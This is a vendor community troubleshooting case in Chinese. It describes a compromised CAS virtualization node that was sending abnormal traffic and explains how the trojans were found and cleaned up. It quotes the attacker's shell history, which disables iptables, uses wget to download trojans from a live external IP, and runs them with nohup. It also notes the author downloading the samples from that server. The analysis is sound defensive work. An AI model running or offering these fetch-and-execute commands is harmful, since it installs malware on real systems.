• 全部
  • 经验案例
  • 典型配置
  • 技术公告
  • FAQ
  • 漏洞说明
  • 全部
  • 全部
  • 大数据引擎
  • 知了引擎
产品线
搜索
取消
案例类型
发布者
是否解决
是否官方
时间
搜索引擎
匹配模式
高级搜索

某客户CAS平台中毒导致网络中断排查案例(二)

2014-12-22 发表
  • 0关注
  • 0收藏 1023浏览
薛泰吉
薛泰吉 六段
粉丝:0人 关注:0人

      某客户CAS平台中毒导致网络中断案例(二)

一、   问题描述:  

某客户CAS平台在运行一段时间后客户使用探测工具发现平台对外发送大量异常报文,影响网络的带宽。

二、   组网环境

CAS平台在内网,整网通过NAT出外网。

三、   过程分析:

1、使用history命令查看命令历史记录,从执行的命令行看,在51日的时候,192.168.2.5 地址的CVK被入侵,植入了木马,如下命令记录:

/etc/init.d/iptables stop                    

wget http://183.136.214.14:8090/1            

echo "nameserver 8.8.8.8" >> /etc/resolv.conf    # 配置DNS

wget http://183.136.214.14:8090/1             # 从间谍网站下载木马

wget http://183.136.214.14:8090/mimi          # 从间谍网站下载木马

echo "nameserver 8.8.8.8" >> /etc/resolv.conf

chmod 0755 ./1                            # 设置执行权限

nohup /root/1 > /dev/null 2>&1 &             后台执行木马

chmod 0755 ./Manager                         

nohup /root/Manager > /dev/null 2>&1 &       后台执行木马

chmod 0755 ./Internet                        

nohup /root/Internet > /dev/null 2>&1 &      

chmod 0755 ./mimi                            

nohup /root/mimi > /dev/null 2>&1 &           后台执行木马

2、打开http://183.136.214.14:8090的网站地址,外网,需要密码,可以以空账号和密码的形式,连续点击多次确定,登录进去;将所有的木马程序都测试下载,在下载过程中,检测到病毒:

  

另外,上述网站中,也有Linux的木马,从下载的文件中,有发生问题的两台CVK上下载的程序,如11hminiManager等;

木马网站所在地址,查看是属于浙江绍兴电信的一个外网地址:

3、采用命令查看到的木马软件:

root@cvknode-data2:~# ls -al

-rwxr-xr-x  1 root root   1295069 Jul 11 11:00 1

-rwxr-xr-x  1 root root    352604 Jul 11 11:00 1h

-rw-r--r--  1 root root        69 Jul 11 11:02 conf.n

-rw-r--r--  1 root root      1328 May 18 23:50 dlcfg

-rwxr-xr-x  1 root root   1513570 May  1 05:51 mimi

其中的两个木马程序:

root@cvknode-data4:~# ps -ef |grep /root/1

root     25537 18785  0 11:09 pts/2    00:00:00 grep --color=auto /root/1

root     54080     1  0 May18 ?        01:07:53 /root/1

root     54084     1  2 May18 ?        1-12:30:52 /root/1h

root@cvknode-data4:~#

强制删除文件,并kill -9 对应的进程后,发现过了一会后,进程和文件又在原来的目录下出现,进程也自动执行起来;

root@cvknode-data4:~# rm -rf 1 1h           // 强制删除文件

root@cvknode-data4:~# ll

total 404420

drwx------  5 root root      4096 Jul 11 11:24 ./

drwxr-xr-x 25 root root      4096 May  7 12:39 ../

-rw-------  1 root root      1407 May  7 11:55 .bash_history

-rw-r--r--  1 root root      3106 Apr 19  2012 .bashrc

drwx------  2 root root      4096 Apr 14 20:13 .cache/

-rw-r--r--  1 root root 414016881 Apr 14 20:33 CAS-F0123H04-Upgrade.tar.gz

-rw-r--r--  1 root root        69 Jul 11 11:24 conf.n

-rw-r--r--  1 root root     55902 Apr 29 17:03 iperf_2.0.5-2.1_amd64.deb

-rw-r--r--  1 root root       140 Apr 19  2012 .profile

drwxr-xr-x  2 root root      4096 Jun 28 11:49 .ssh/

drwxrwxr-x  6 1005 1006      4096 Apr 14 20:36 upgrade.f0123h04/

-rw-------  1 root root      4507 Apr 29 17:11 .viminfo       // 消失了

root@cvknode-data4:~# ll

total 404420

drwx------  5 root root      4096 Jul 11 11:24 ./

drwxr-xr-x 25 root root      4096 May  7 12:39 ../

-rw-------  1 root root      1407 May  7 11:55 .bash_history

-rw-r--r--  1 root root      3106 Apr 19  2012 .bashrc

drwx------  2 root root      4096 Apr 14 20:13 .cache/

-rw-r--r--  1 root root 414016881 Apr 14 20:33 CAS-F0123H04-Upgrade.tar.gz

-rw-r--r--  1 root root        69 Jul 11 11:25 conf.n

-rw-r--r--  1 root root     55902 Apr 29 17:03 iperf_2.0.5-2.1_amd64.deb

-rw-r--r--  1 root root       140 Apr 19  2012 .profile

drwxr-xr-x  2 root root      4096 Jun 28 11:49 .ssh/

drwxrwxr-x  6 1005 1006      4096 Apr 14 20:36 upgrade.f0123h04/

-rw-------  1 root root      4507 Apr 29 17:11 .viminfo

root@cvknode-data4:~# ps -ef | grep /root

root     53954     1  0 11:24 ?        00:00:00 /root/1

root     54418     1  0 11:24 ?        00:00:00 /root/1h

root     56822 18785  0 11:25 pts/2    00:00:00 grep --color=auto /root

root@cvknode-data4:~# kill -9 53954 54418             // 强制kill掉对应的进程

root@cvknode-data4:~# ps -ef | grep /root              //进程不在了

root     57691 18785  0 11:25 pts/2    00:00:00 grep --color=auto /root

root@cvknode-data4:~# ls -al

total 404420

drwx------  5 root root      4096 Jul 11 11:24 .

drwxr-xr-x 25 root root      4096 May  7 12:39 ..

-rw-------  1 root root      1407 May  7 11:55 .bash_history

-rw-r--r--  1 root root      3106 Apr 19  2012 .bashrc

drwx------  2 root root      4096 Apr 14 20:13 .cache

-rw-r--r--  1 root root 414016881 Apr 14 20:33 CAS-F0123H04-Upgrade.tar.gz

-rw-r--r--  1 root root        69 Jul 11 11:25 conf.n

-rw-r--r--  1 root root     55902 Apr 29 17:03 iperf_2.0.5-2.1_amd64.deb

-rw-r--r--  1 root root       140 Apr 19  2012 .profile

drwxr-xr-x  2 root root      4096 Jun 28 11:49 .ssh

drwxrwxr-x  6 1005 1006      4096 Apr 14 20:36 upgrade.f0123h04

-rw-------  1 root root      4507 Apr 29 17:11 .viminfo

root@cvknode-data4:~# ps -ef | grep /root              // 进程又自动回复了

root     58314     1  0 11:26 ?        00:00:00 /root/1

root     58318     1  0 11:26 ?        00:00:00 /root/1h

root     58418 18785  0 11:26 pts/2    00:00:00 grep --color=auto /root

root@cvknode-data4:~# ls -al

total 406036

drwx------  5 root root      4096 Jul 11 11:26 .

drwxr-xr-x 25 root root      4096 May  7 12:39 ..

-rwxr-xr-x  1 root root   1295069 Jul 11 11:26 1

-rwxr-xr-x  1 root root    352604 Jul 11 11:26 1h          //文件也自动恢复了

-rw-------  1 root root      1407 May  7 11:55 .bash_history

-rw-r--r--  1 root root      3106 Apr 19  2012 .bashrc

drwx------  2 root root      4096 Apr 14 20:13 .cache

-rw-r--r--  1 root root 414016881 Apr 14 20:33 CAS-F0123H04-Upgrade.tar.gz

-rw-r--r--  1 root root        69 Jul 11 11:26 conf.n

-rw-r--r--  1 root root     55902 Apr 29 17:03 iperf_2.0.5-2.1_amd64.deb

-rw-r--r--  1 root root       140 Apr 19  2012 .profile

drwxr-xr-x  2 root root      4096 Jun 28 11:49 .ssh

drwxrwxr-x  6 1005 1006      4096 Apr 14 20:36 upgrade.f0123h04

-rw-------  1 root root      4507 Apr 29 17:11 .viminfo

出问题的两台CVK上都存在对应的对应的进程,如192.168.2.7上,还存在更多的木马进程,从文件创建日期看,在51日创建的;

4、木马程序中,其中的部分txt文档中,含有另外一个网站的地址,截图如下,感觉图片比较形象,由于是法文,可以切换成英文,没有仔细分析。

   

  

  

  

   

  

  

四、   解决方法:

1、 重新部署有问题的CVK节点,部署时使用较复杂的root密码,包含大小写,数字和特殊的字符信息,其他节点将root密码修改。

2、 增加防火墙,在防火墙上做好安全策略,使CAS平台与外界网络完全隔开。


该案例对您是否有帮助:

您的评价:1

若您有关于案例的建议,请反馈:

作者在2019-06-11对此案例进行了修订
0 个评论

该案例暂时没有网友评论

编辑评论

举报

×

侵犯我的权益 >
对根叔知了社区有害的内容 >
辱骂、歧视、挑衅等(不友善)

侵犯我的权益

×

泄露了我的隐私 >
侵犯了我企业的权益 >
抄袭了我的内容 >
诽谤我 >
辱骂、歧视、挑衅等(不友善)
骚扰我

泄露了我的隐私

×

您好,当您发现根叔知了上有泄漏您隐私的内容时,您可以向根叔知了进行举报。 请您把以下内容通过邮件发送到pub.zhiliao@h3c.com 邮箱,我们会尽快处理。
  • 1. 您认为哪些内容泄露了您的隐私?(请在邮件中列出您举报的内容、链接地址,并给出简短的说明)
  • 2. 您是谁?(身份证明材料,可以是身份证或护照等证件)

侵犯了我企业的权益

×

您好,当您发现根叔知了上有关于您企业的造谣与诽谤、商业侵权等内容时,您可以向根叔知了进行举报。 请您把以下内容通过邮件发送到 pub.zhiliao@h3c.com 邮箱,我们会在审核后尽快给您答复。
  • 1. 您举报的内容是什么?(请在邮件中列出您举报的内容和链接地址)
  • 2. 您是谁?(身份证明材料,可以是身份证或护照等证件)
  • 3. 是哪家企业?(营业执照,单位登记证明等证件)
  • 4. 您与该企业的关系是?(您是企业法人或被授权人,需提供企业委托授权书)
我们认为知名企业应该坦然接受公众讨论,对于答案中不准确的部分,我们欢迎您以正式或非正式身份在根叔知了上进行澄清。

抄袭了我的内容

×

原文链接或出处

诽谤我

×

您好,当您发现根叔知了上有诽谤您的内容时,您可以向根叔知了进行举报。 请您把以下内容通过邮件发送到pub.zhiliao@h3c.com 邮箱,我们会尽快处理。
  • 1. 您举报的内容以及侵犯了您什么权益?(请在邮件中列出您举报的内容、链接地址,并给出简短的说明)
  • 2. 您是谁?(身份证明材料,可以是身份证或护照等证件)
我们认为知名企业应该坦然接受公众讨论,对于答案中不准确的部分,我们欢迎您以正式或非正式身份在根叔知了上进行澄清。

对根叔知了社区有害的内容

×

垃圾广告信息
色情、暴力、血腥等违反法律法规的内容
政治敏感
不规范转载 >
辱骂、歧视、挑衅等(不友善)
骚扰我
诱导投票

不规范转载

×

举报说明

提出建议

    +
网站相关
关于我们
服务条款
帮助中心
经验与权限
积分规则
联系我们
联系我们
建议反馈
常用链接
知了APP下载
标杆的神器下载
关注我们
H3C官网
新华三服务公众号
安仔远程运维服务
新华三商城
内容许可
除特别说明外,用户内容均可采用知识共享署名-相同方式共享3.0中国大陆许可协议进行许可

Copyright©2024新华三集团保留一切权利 当前呈现版本 NO.1

本图标版权归新华三集团所有,仅限本社区使用,切勿用做商业目的,违者必究

浙ICP备09064986号-1   浙公网安备 33010802004416号

亲~登录后才可以操作哦!

确定

亲~检测到您登陆的账号未在http://hclhub.h3c.com进行注册

注册后可访问此模块

跳转hclhub

你的邮箱还未认证,请认证邮箱或绑定手机后进行当前操作